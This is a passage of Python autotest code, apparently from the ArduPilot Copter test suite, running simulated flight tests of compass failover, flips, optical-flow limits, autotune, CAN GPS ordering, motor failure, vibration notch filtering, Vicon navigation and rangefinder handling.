tstart = self.get_sim_time()
self.progress("Circle at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("heading %d" % m.heading)
self.progress("CIRCLE OK for %u seconds" % holdtime)
self.do_RTL()
# test_mag_fail - test failover of compass in EKF
def test_mag_fail(self):
# we want both EK2 and EK3
self.set_parameter("EK2_ENABLE", 1)
self.set_parameter("EK3_ENABLE", 1)
self.takeoff(10, mode="LOITER")
self.change_mode('CIRCLE')
self.delay_sim_time(20)
self.context_collect("STATUSTEXT")
self.progress("Failing first compass")
self.set_parameter("SIM_MAG1_FAIL", 1)
# we wait for the message twice, once for EK2 and again for EK3
self.wait_statustext("EKF2 IMU0 switching to compass 1", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 1", check_context=True)
self.progress("compass switch 1 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 2nd compass")
self.set_parameter("SIM_MAG2_FAIL", 1)
self.wait_statustext("EKF2 IMU0 switching to compass 2", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 2", check_context=True)
self.progress("compass switch 2 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 3rd compass")
self.set_parameter("SIM_MAG3_FAIL", 1)
self.delay_sim_time(2)
self.set_parameter("SIM_MAG1_FAIL", 0)
self.wait_statustext("EKF2 IMU0 switching to compass 0", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 0", check_context=True)
self.progress("compass switch 0 OK")
self.do_RTL()
def wait_attitude(self, desroll=None, despitch=None, timeout=2, tolerance=10):
'''wait for an attitude (degrees)'''
if desroll is None and despitch is None:
raise ValueError("despitch or desroll must be supplied")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise AutoTestTimeoutException("Failed to achieve attitude")
m = self.mav.recv_match(type='ATTITUDE', blocking=True)
roll_deg = math.degrees(m.roll)
pitch_deg = math.degrees(m.pitch)
self.progress("wait_att: roll=%f desroll=%s pitch=%f despitch=%s" %
(roll_deg, desroll, pitch_deg, despitch))
if desroll is not None and abs(roll_deg - desroll) > tolerance:
continue
if despitch is not None and abs(pitch_deg - despitch) > tolerance:
continue
return
def fly_flip(self):
ex = None
try:
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 100)
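# stream ATTITUDE at 100Hz so wait_attitude can track the fast flip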
self.takeoff(20)
self.hover()
old_speedup = self.get_parameter("SIM_SPEEDUP")
self.set_parameter('SIM_SPEEDUP', 1)
self.progress("Flipping in roll")
self.set_rc(1, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=0, desroll=45, tolerance=30)
self.wait_attitude(despitch=0, desroll=90, tolerance=30)
self.wait_attitude(despitch=0, desroll=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(1, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.progress("Regaining altitude")
self.change_mode('ALT_HOLD')
self.wait_for_alt(20, max_err=40)
self.progress("Flipping in pitch")
self.set_rc(2, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=45, desroll=0, tolerance=30)
# can't check roll here as it flips from 0 to -180..
self.wait_attitude(despitch=90, tolerance=30)
self.wait_attitude(despitch=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(2, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.set_parameter('SIM_SPEEDUP', old_speedup)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 0)
if ex is not None:
raise ex
# fly_optical_flow_limits - test EKF navigation limiting
def fly_optical_flow_limits(self):
ex = None
self.context_push()
try:
self.set_parameter("SIM_FLOW_ENABLE", 1)
self.set_parameter("FLOW_TYPE", 10)
# configure EKF to use optical flow instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 0)
self.set_parameter("EK3_SRC1_VELXY", 5)
self.set_parameter("EK3_SRC1_VELZ", 0)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_GPS_DISABLE", 1)
self.set_parameter("SIM_TERRAIN", 0)
self.reboot_sitl()
# we can't take off in LOITER as we need the flow sensor healthy first
self.takeoff(alt_min=5, mode='ALT_HOLD', require_absolute=False, takeoff_throttle=1800)
self.change_mode('LOITER')
# horizontal speed should be limited by the EKF optical-flow limits;
# the exact ceiling depends on height, so it is computed in the loop below
self.set_rc(2, 1000)
tstart = self.get_sim_time()
timeout = 60
started_climb = False
while self.get_sim_time_cached() - tstart < timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
spd = math.sqrt(m.vx**2 + m.vy**2) * 0.01
alt = m.relative_alt*0.001
# calculate max speed from altitude above the ground
margin = 2.0
max_speed = alt * 1.5 + margin
self.progress("%0.1f: Low Speed: %f (want <= %u) alt=%.1f" %
(self.get_sim_time_cached() - tstart,
spd,
max_speed, alt))
if spd > max_speed:
raise NotAchievedException(("Speed should be limited by"
"EKF optical flow limits"))
# after 30 seconds start climbing
if not started_climb and self.get_sim_time_cached() - tstart > 30:
started_climb = True
self.set_rc(3, 1900)
self.progress("Moving higher")
# check altitude is not climbing above 35m
if alt > 35:
raise NotAchievedException("Alt should be limited by EKF optical flow limits")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_rc(2, 1500)
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_autotune(self):
"""Test autotune mode"""
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
self.takeoff(10)
# hold position in loiter
self.change_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# near enough for now:
self.change_mode('LAND')
self.wait_landed_and_disarmed()
# check the original gains have been re-instated
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
def fly_autotune_switch(self):
"""Test autotune on a switch with gains being saved"""
# autotune changes a set of parameters on the vehicle which
# are not in our context. That changes the flight
# characteristics, which we can't afford between runs. So
# completely reset the simulated vehicle after the run is
# complete by "customising" the commandline here:
self.customise_SITL_commandline([])
self.context_push()
ex = None
try:
self.fly_autotune_switch_body()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_autotune_switch_body(self):
self.set_parameter("RC8_OPTION", 17)
self.set_parameter("ATC_RAT_RLL_FLTT", 20)
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
rllt = self.get_parameter("ATC_RAT_RLL_FLTT")
self.progress("AUTOTUNE pre-gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"),
self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
self.takeoff(10, mode='LOITER')
# hold position in loiter and run autotune
self.set_rc(8, 1850)
self.wait_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# Check original gains are re-instated
self.set_rc(8, 1100)
self.delay_sim_time(1)
self.progress("AUTOTUNE original gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
# Use autotuned gains
self.set_rc(8, 1850)
self.delay_sim_time(1)
self.progress("AUTOTUNE testing gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present in pilot testing")
# land without changing mode
self.set_rc(3, 1000)
self.wait_for_alt(0)
self.wait_disarmed()
# Check gains are still there after disarm
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on disarm")
self.reboot_sitl()
# Check gains are still there after reboot
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on reboot")
# Check FLTT is unchanged
if rllt != self.get_parameter("ATC_RAT_RLL_FLTT"):
raise NotAchievedException("AUTOTUNE FLTT was modified")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
# fly_auto_test - fly mission which tests a significant number of commands
def fly_auto_test(self):
# Fly mission #1
self.progress("# Load copter_mission")
# load the waypoint count
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode("AUTO")
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Auto mission completed: passed!")
# fly_auto_test using CAN GPS - fly mission which tests normal operation alongside CAN GPS
def fly_auto_test_using_can_gps(self):
self.set_parameter("CAN_P1_DRIVER", 1)
self.set_parameter("GPS_TYPE", 9)
self.set_parameter("GPS_TYPE2", 9)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.context_push()
self.set_parameter("ARMING_CHECK", 1 << 3)
self.context_collect('STATUSTEXT')
self.reboot_sitl()
# Test that UAVCAN GPS ordering works
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
gps1_nodeid = int(gps1_det_text.split('-')[1])
gps2_nodeid = int(gps2_det_text.split('-')[1])
if gps1_nodeid is None or gps2_nodeid is None:
raise NotAchievedException("GPS not ordered per the order of Node IDs")
self.context_stop_collecting('STATUSTEXT')
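# each case is [GPS1 override, GPS2 override, expected node id for
# GPS 1, expected node id for GPS 2, expected prearm failure text
# ("" meaning arming should not be refused)]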
GPS_Order_Tests = [[gps2_nodeid, gps2_nodeid, gps2_nodeid, 0,
"PreArm: Same Node Id {} set for multiple GPS".format(gps2_nodeid)],
[gps1_nodeid, int(gps2_nodeid/2), gps1_nodeid, 0,
"Selected GPS Node {} not set as instance {}".format(int(gps2_nodeid/2), 2)],
[int(gps1_nodeid/2), gps2_nodeid, 0, gps2_nodeid,
"Selected GPS Node {} not set as instance {}".format(int(gps1_nodeid/2), 1)],
[gps1_nodeid, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""],
[gps2_nodeid, gps1_nodeid, gps2_nodeid, gps1_nodeid, ""],
[gps1_nodeid, 0, gps1_nodeid, gps2_nodeid, ""],
[0, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""]]
for case in GPS_Order_Tests:
self.progress("############################### Trying Case: " + str(case))
self.set_parameter("GPS1_CAN_OVRIDE", case[0])
self.set_parameter("GPS2_CAN_OVRIDE", case[1])
self.drain_mav()
self.context_collect('STATUSTEXT')
self.reboot_sitl()
gps1_det_text = None
gps2_det_text = None
try:
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
try:
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
self.context_stop_collecting('STATUSTEXT')
self.change_mode('LOITER')
if case[2] == 0 and case[3] == 0:
if gps1_det_text or gps2_det_text:
raise NotAchievedException("Failed ordering for requested CASE:", case)
if case[2] == 0 or case[3] == 0:
if bool(gps1_det_text is not None) == bool(gps2_det_text is not None):
print(gps1_det_text)
print(gps2_det_text)
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps1_det_text:
if case[2] != int(gps1_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps2_det_text:
if case[3] != int(gps2_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if len(case[4]):
self.context_collect('STATUSTEXT')
self.run_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0,
timeout=10,
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext(case[4], check_context=True)
self.context_stop_collecting('STATUSTEXT')
self.progress("############################### All GPS Order Cases Tests Passed")
self.context_pop()
self.fly_auto_test()
def fly_motor_fail(self, fail_servo=0, fail_mul=0.0, holdtime=30):
"""Test flight with reduced motor efficiency"""
# we only expect an octocopter to survive ATM:
servo_counts = {
# 2: 6, # hexa
3: 8, # octa
# 5: 6, # Y6
}
frame_class = int(self.get_parameter("FRAME_CLASS"))
if frame_class not in servo_counts:
self.progress("Test not relevant for frame_class %u" % frame_class)
return
servo_count = servo_counts[frame_class]
if fail_servo < 0 or fail_servo > servo_count:
raise ValueError('fail_servo outside range for frame class')
self.takeoff(10, mode="LOITER")
self.change_alt(alt_min=50)
# Get initial values
start_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
hover_time = 5
try:
tstart = self.get_sim_time()
int_error_alt = 0
int_error_yaw_rate = 0
int_error_yaw = 0
self.progress("Hovering for %u seconds" % hover_time)
failed = False
while True:
now = self.get_sim_time_cached()
if now - tstart > holdtime + hover_time:
break
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW',
blocking=True)
hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
if not failed and now - tstart > hover_time:
self.progress("Killing motor %u (%u%%)" %
(fail_servo+1, fail_mul))
self.set_parameter("SIM_ENGINE_FAIL", fail_servo)
self.set_parameter("SIM_ENGINE_MUL", fail_mul)
failed = True
if failed:
self.progress("Hold Time: %f/%f" % (now-tstart, holdtime))
servo_pwm = [servo.servo1_raw,
servo.servo2_raw,
servo.servo3_raw,
servo.servo4_raw,
servo.servo5_raw,
servo.servo6_raw,
servo.servo7_raw,
servo.servo8_raw]
self.progress("PWM output per motor")
for i, pwm in enumerate(servo_pwm[0:servo_count]):
if pwm > 1900:
state = "oversaturated"
elif pwm < 1200:
state = "undersaturated"
else:
state = "OK"
if failed and i == fail_servo:
state += " (failed)"
self.progress("servo %u [pwm=%u] [%s]" % (i+1, pwm, state))
alt_delta = hud.alt - start_hud.alt
yawrate_delta = attitude.yawspeed - start_attitude.yawspeed
yaw_delta = attitude.yaw - start_attitude.yaw
self.progress("Alt=%fm (delta=%fm)" % (hud.alt, alt_delta))
self.progress("Yaw rate=%f (delta=%f) (rad/s)" %
(attitude.yawspeed, yawrate_delta))
self.progress("Yaw=%f (delta=%f) (deg)" %
(attitude.yaw, yaw_delta))
dt = self.get_sim_time() - now
int_error_alt += abs(alt_delta/dt)
int_error_yaw_rate += abs(yawrate_delta/dt)
int_error_yaw += abs(yaw_delta/dt)
self.progress("## Error Integration ##")
self.progress(" Altitude: %fm" % int_error_alt)
self.progress(" Yaw rate: %f rad/s" % int_error_yaw_rate)
self.progress(" Yaw: %f deg" % int_error_yaw)
self.progress("----")
if int_error_yaw_rate > 0.1:
raise NotAchievedException("Vehicle is spinning")
if alt_delta < -20:
raise NotAchievedException("Vehicle is descending")
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
except Exception as e:
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
raise e
self.do_RTL()
def fly_motor_vibration(self):
"""Test flight with motor vibration"""
self.context_push()
ex = None
try:
self.set_rc_default()
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
# these are real values taken from a 180mm Quad:
"SIM_GYR1_RND": 20,
"SIM_ACC1_RND": 5,
"SIM_ACC2_RND": 5,
"SIM_INS_THR_MIN": 0.1,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# if we don't reduce vibes here then the landing detector
# may not trigger
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
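# mavfft_fttd computes a power spectral density from the batch-logged
# IMU data over the hover window (times are in microseconds)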
# ignore the first 20Hz and look for a peak at -15dB or more
ignore_bins = 20
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
if numpy.amax(psd["X"][ignore_bins:]) < -15 or freq < 180 or freq > 300:
raise NotAchievedException(
"Did not detect a motor peak, found %f at %f dB" %
(freq, numpy.amax(psd["X"][ignore_bins:])))
else:
self.progress("Detected motor peak at %fHz" % freq)
# now add a notch and check that post-filter the peak is squashed below -23dB
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_NOTCH_ENABLE": 1,
"INS_NOTCH_FREQ": freq,
"INS_NOTCH_ATT": 50,
"INS_NOTCH_BW": freq/2,
"SIM_VIB_MOT_MAX": 350,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
peakdB = numpy.amax(psd["X"][ignore_bins:])
if peakdB < -23:
self.progress("Did not detect a motor peak, found %f at %f dB" % (freq, peakdB))
else:
raise NotAchievedException("Detected peak %.1f Hz %.2f dB" % (freq, peakdB))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_vision_position(self):
"""Disable GPS navigation, enable Vicon input."""
# scribble down a location we can set origin to:
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
self.progress("Waiting for location")
self.change_mode('LOITER')
self.wait_ready_to_arm()
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
# configure EKF to use external nav instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 6)
self.set_parameter("EK3_SRC1_VELXY", 6)
self.set_parameter("EK3_SRC1_POSZ", 6)
self.set_parameter("EK3_SRC1_VELZ", 6)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("VISO_TYPE", 1)
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.reboot_sitl()
# without a GPS or some sort of external prompting, AP
# doesn't send system_time messages. So prompt it:
self.mav.mav.system_time_send(int(time.time() * 1000000), 0)
self.progress("Waiting for non-zero-lat")
tstart = self.get_sim_time()
while True:
self.mav.mav.set_gps_global_origin_send(1,
old_pos.lat,
old_pos.lon,
old_pos.alt)
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.progress("gpi=%s" % str(gpi))
if gpi.lat != 0:
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not get non-zero lat")
self.takeoff()
self.set_rc(1, 1600)
tstart = self.get_sim_time()
while True:
vicon_pos = self.mav.recv_match(type='VISION_POSITION_ESTIMATE',
blocking=True)
# print("vpe=%s" % str(vicon_pos))
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# self.progress("gpi=%s" % str(gpi))
if vicon_pos.x > 40:
break
if self.get_sim_time_cached() - tstart > 100:
raise AutoTestTimeoutException("Vicon showed no movement")
# recenter controls:
self.set_rc(1, 1500)
self.progress("# Enter RTL")
self.change_mode('RTL')
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not disarm")
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# print("gpi=%s" % str(gpi))
self.mav.recv_match(type='SIMSTATE',
blocking=True)
# print("ss=%s" % str(ss))
# wait for RTL disarm:
if not self.armed():
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gps_vicon_switching(self):
"""Fly GPS and Vicon switching test"""
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
"""Setup parameters including switching to EKF3"""
self.context_push()
ex = None
try:
self.set_parameters({
"VISO_TYPE": 2, # enable vicon
"SERIAL5_PROTOCOL": 2,
"EK3_ENABLE": 1,
"EK3_SRC2_POSXY": 6, # External Nav
"EK3_SRC2_POSZ": 6, # External Nav
"EK3_SRC2_VELXY": 6, # External Nav
"EK3_SRC2_VELZ": 6, # External Nav
"EK3_SRC2_YAW": 6, # External Nav
"RC7_OPTION": 80, # RC aux switch 7 set to Viso Align
"RC8_OPTION": 90, # RC aux switch 8 set to EKF source selector
"EK2_ENABLE": 0,
"AHRS_EKF_TYPE": 3,
})
self.reboot_sitl()
# switch to use GPS
self.set_rc(8, 1000)
# ensure we can get a global position:
self.poll_home_position(timeout=120)
# record starting position
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
# align vicon yaw with ahrs heading
self.set_rc(7, 2000)
# takeoff to 10m in Loiter
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="LOITER", require_absolute=True, timeout=720)
# fly forward in Loiter
self.set_rc(2, 1300)
# disable vicon
self.set_parameter("SIM_VICON_FAIL", 1)
# ensure vehicle remains in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# re-enable vicon
self.set_parameter("SIM_VICON_FAIL", 0)
# switch to vicon, disable GPS and wait 15sec to ensure vehicle remains in Loiter
self.set_rc(8, 1500)
self.set_parameter("GPS_TYPE", 0)
# ensure vehicle remains in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# RTL and check vehicle arrives within 10m of home
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rtl_speed(self):
"""Test RTL Speed parameters"""
rtl_speed_ms = 7
wpnav_speed_ms = 4
wpnav_accel_mss = 3
tolerance = 0.5
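        # WPNAV_* and RTL_SPEED parameters are in cm/s (and cm/s/s),
        # hence the *100 conversions below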
self.load_mission("copter_rtl_speed.txt")
self.set_parameter('WPNAV_ACCEL', wpnav_accel_mss * 100)
self.set_parameter('RTL_SPEED', rtl_speed_ms * 100)
self.set_parameter('WPNAV_SPEED', wpnav_speed_ms * 100)
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_altitude(19, 25, relative=True)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, timeout=20)
self.change_mode('RTL')
self.wait_groundspeed(rtl_speed_ms-tolerance, rtl_speed_ms+tolerance)
self.monitor_groundspeed(rtl_speed_ms, timeout=5)
self.change_mode('AUTO')
self.wait_groundspeed(0-tolerance, 0+tolerance)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, tolerance=0.6, timeout=5)
self.do_RTL()
def fly_nav_delay(self):
"""Fly a simple mission that has a delay in it."""
self.load_mission("copter_nav_delay.txt")
self.set_parameter("DISARM_DELAY", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_start = -1
count_stop = -1
tstart = self.get_sim_time()
last_mission_current_msg = 0
last_seq = None
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 200:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == 3:
at_delay_item = "(At delay item)"
if count_start == -1:
count_start = now
if ((now - last_mission_current_msg) > 1 or m.seq != last_seq):
dist = None
x = self.mav.messages.get("NAV_CONTROLLER_OUTPUT", None)
if x is not None:
dist = x.wp_dist
self.progress("MISSION_CURRENT.seq=%u dist=%s %s" %
(m.seq, dist, at_delay_item))
last_mission_current_msg = self.get_sim_time_cached()
last_seq = m.seq
if m.seq > 3:
if count_stop == -1:
count_stop = now
calculated_delay = count_stop - count_start
want_delay = 59 # should reflect what's in the mission file
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, want_delay))
if calculated_delay < want_delay:
raise NotAchievedException("Did not delay for long enough")
def test_rangefinder(self):
ex = None
self.context_push()
self.progress("Making sure we don't ordinarily get RANGEFINDER")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=5)
if m is not None:
raise NotAchievedException("Received unexpected RANGEFINDER msg")
# may need to force a rotation if some other test has used the
# rangefinder...
self.progress("Ensure no RFND messages in log")
self.set_parameter("LOG_DISARMED", 1)
if self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Found unexpected RFND message")
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl()
self.progress("Making sure we now get RANGEFINDER messages")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=10)
if m is None:
raise NotAchievedException("Did not get expected RANGEFINDER msg")
self.progress("Checking RangeFinder is marked as enabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
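            # ArduPilot advertises the rangefinder via the
            # LASER_POSITION bit in SYS_STATUS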
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.progress("Disabling laser using switch")
self.set_rc(9, 1000)
self.delay_sim_time(1)
self.progress("Checking RangeFinder is marked as disabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser enabled in SYS_STATUS")
self.progress("Re-enabling rangefinder")
self.set_rc(9, 2000)
self.delay_sim_time(1)
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.takeoff(10, mode="LOITER")
m_r = self.mav.recv_match(type='RANGEFINDER',
blocking=True)
m_p = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
if abs(m_r.distance - m_p.relative_alt/1000) > 1:
raise NotAchievedException(
